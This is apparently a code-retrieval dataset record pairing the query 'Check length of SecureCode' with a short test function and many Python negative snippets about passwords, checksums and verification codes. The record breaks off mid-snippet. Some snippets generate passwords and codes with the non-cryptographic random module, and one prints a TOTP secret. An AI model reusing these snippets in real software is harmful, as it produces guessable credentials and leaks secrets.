abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD\"\n result = Solution().lengthOfLongestSubstring2(s)\n self.assertEqual(result, 95)", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def is_sedol(value):\n return re.match(r'^[0-9BCDFGHJKLMNPQRSTVWXYZ]{6}\\d$', value)", "def validate_password(password):\n return isinstance(password, str) and len(password) >= 8 and \\\n re.search(r'[A-Z]', password) and re.search(r'[0-9]', password)", "def strlen(val): \n return len(val)", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def check_passcode_required(document_html):\n if \"visitor[passcode]\" in document_html:\n return True\n else:\n return False", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def generate_verification_code(self, size=10, chars=string.digits):\n return \"\".join(random.choice(chars) for _ in range(size))", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def check_pwd_policy1(processed):\n policy, letter, pwd = processed\n return pwd.count(letter) in policy", "def test_random_code_generator(self):\n # Produces similar to '8FHGNH'\n code = random_code_generator()\n self.assertEquals(len(code), 6)\n code_2 = random_code_generator()\n if code == code_2:\n self.assertEquals(False)\n # Produces similar to 'CFB-U8X-9KE-TY8':\n code_3 = random_code_generator(12, 4, '-')\n self.assertEquals(len(code_3), 15)\n self.assertEquals(len(code_3.replace('-', '')), 12)\n code_4 = random_code_generator(100, banned_chars='X')\n self.assertEquals(code_4.find('X'), -1)", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def is_valid_password(variable):\n if re.match(r'[A-Za-z0-9@#$%^&+=]{8,}', variable):\n return True\n return False", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def generate_password(length=20):\r\n # type: (int) -> str\r\n return ('%0'+str(length)+'x') % random.randrange(16 ** length)", "def test_cpf_has_11_digits(self):\r\n form = self.make_validated_form(cpf='1234')\r\n self.assertFormErrorCode(form, 'cpf', 'length')", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def sanetoken(token):\n\t# len(CryptoHelper.longEncode(2**4096)) = 1372\n\tMAX_TOKEN_LEN = 1372\n\treturn len(token) <= MAX_TOKEN_LEN", "def is_valid_payload(p):\n # if the checksum is valid the checksum calculation, without removing the\n # checksum, should be equal to zero\n\n if checksum16(p) == 0:\n return True\n else:\n return False", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def _is_valid_key(self, key):\r\n\r\n # Check the length\r\n if len(key) > 250:\r\n return False\r\n\r\n # Check that there are no spaces or control characters\r\n for char in key:\r\n if ord(char) < 33 or ord(char) == 127:\r\n return False\r\n\r\n return True", "def validate(self, data):\n password = data['password']\n if data['password'] == data['password2'] and re.fullmatch(r'[A-Za-z0-9@#$%^&+=]{8,}', password):\n return data\n raise serializers.ValidationError(\"Password should be match and password must have number,special char,1-capital,1-small and min 8 char\")", "def luhn_verifica(ccred):\n \n # Primeiro criamos uma nova cadeia, n, com os digitos do cartao de credito sem o de controle.\n # Usamos a funcao calc_soma para somar os digitos do cartao de acordo com o algoritmo de Luhn e juntamos o digito de controle. Caso este ultimo nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Caso o resto da divisao por 10 seja 0, a funcao devolve o valor logico True. \n \n\n n = ccred[:-1]\n dig_verificacao = ccred[-1]\n \n if '0' <= dig_verificacao <= '9':\n soma = calc_soma(n) + eval(dig_verificacao)\n \n else:\n raise ValueError ('function luhn_verifica() O string recebido apenas pode conter digitos') \n \n return soma % 10 == 0", "def test_right_checksum(self):\n self.assertEqual(utils.checksum('fooo'), 'L')" ]
[ "0.65187556", "0.64862204", "0.64156276", "0.6369722", "0.635985", "0.6273854", "0.6231202", "0.61325234", "0.6130397", "0.6046088", "0.6041387", "0.6014855", "0.59593093", "0.59332305", "0.58832985", "0.587831", "0.5856602", "0.58545417", "0.58352524", "0.5809067", "0.57998765", "0.5772197", "0.5767344", "0.57654417", "0.57615197", "0.5759074", "0.57396555", "0.573709", "0.57274216", "0.57116497", "0.56985754", "0.5694296", "0.56924915", "0.5692205", "0.5687493", "0.56859624", "0.5677893", "0.5669426", "0.5668952", "0.56606585", "0.5612483", "0.56087685", "0.55717874", "0.55513394", "0.5543613", "0.5525207", "0.55226296", "0.5499571", "0.54983306", "0.54941714", "0.54906833", "0.5489176", "0.5483284", "0.5481176", "0.5478031", "0.54753405", "0.5471657", "0.546675", "0.54627883", "0.54573685", "0.5453394", "0.5452467", "0.54523665", "0.5448551", "0.5440116", "0.5428845", "0.54237586", "0.5421163", "0.54198104", "0.5405877", "0.54057515", "0.54057515", "0.5405649", "0.54002357", "0.53969026", "0.5391531", "0.5388647", "0.5385929", "0.5382834", "0.5380212", "0.5380205", "0.5378986", "0.5371827", "0.53687423", "0.53682077", "0.536065", "0.5358565", "0.53540945", "0.5334992", "0.53325593", "0.53321654", "0.53297466", "0.5326117", "0.53111607", "0.5305696", "0.5303853", "0.5297327", "0.5297007", "0.5294556", "0.52939", "0.52909493" ]
0.0
-1
Check length of SecureCode (SecureCode= 123 )
def test_38(self): assert 'True' == Api.requestBlock('test-38')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def __len__(self):\n return len(self.code)", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def __len__(self):\n return self.cli.passwords.len()", "def is_private(code):\n return 4000 <= code <= 4999", "def check_digit(raw_code):\n s = sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def is_reserved(code):\n return 1000 <= code <= 2999", "def checksum(code):\n return sum(code) % 256", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def SecondPart():\n return passwordChecker(data)", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def strlen(val): \n return len(val)", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should not be less than four characters.\")", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def _get_checksum(code: str) -> int:\r\n total = 0\r\n\r\n for index, digit in enumerate(code):\r\n digit = int(digit)\r\n if (index + 1) % 2 != 0:\r\n digit *= 2\r\n if digit > 9:\r\n digit -= 9\r\n total += digit\r\n\r\n checksum = 10 - total % 10\r\n\r\n return checksum if checksum != 10 else 0", "def strlen(self, tuple_data, val):\r\n return len(val)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. n_bytes must be < 97.\")\n else:\n return verifier", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def test_luhn_checksum(self):\n check_digit = calculate_luhn(\"7992739871\")\n assert check_digit == 3", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * \\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def len12(self, len): # -> None:\n ...", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n 